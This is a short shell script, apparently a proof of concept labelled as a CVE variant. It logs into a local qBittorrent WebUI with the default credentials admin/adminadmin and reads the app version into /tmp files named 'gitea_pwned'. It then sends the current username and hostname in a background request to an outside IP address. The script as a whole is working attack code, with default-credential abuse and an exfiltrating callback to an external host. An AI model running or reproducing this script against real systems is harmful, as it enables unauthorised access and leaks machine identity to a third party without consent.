#!/bin/sh
# CVE-2026-60004 variant a
(curl -s -X POST 'http://127.0.0.1:8085/api/v2/auth/login' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=admin&password=adminadmin' -o /tmp/qbt_login.txt -w '%{http_code}'; curl -s 'http://127.0.0.1:8085/api/v2/app/version' -o /tmp/qbt_version.txt) > /tmp/gitea_pwned_a.txt 2>&1
curl -s http://202.79.169.91:28016/pwned_a_$(whoami)_$(hostname) 2>/dev/null &
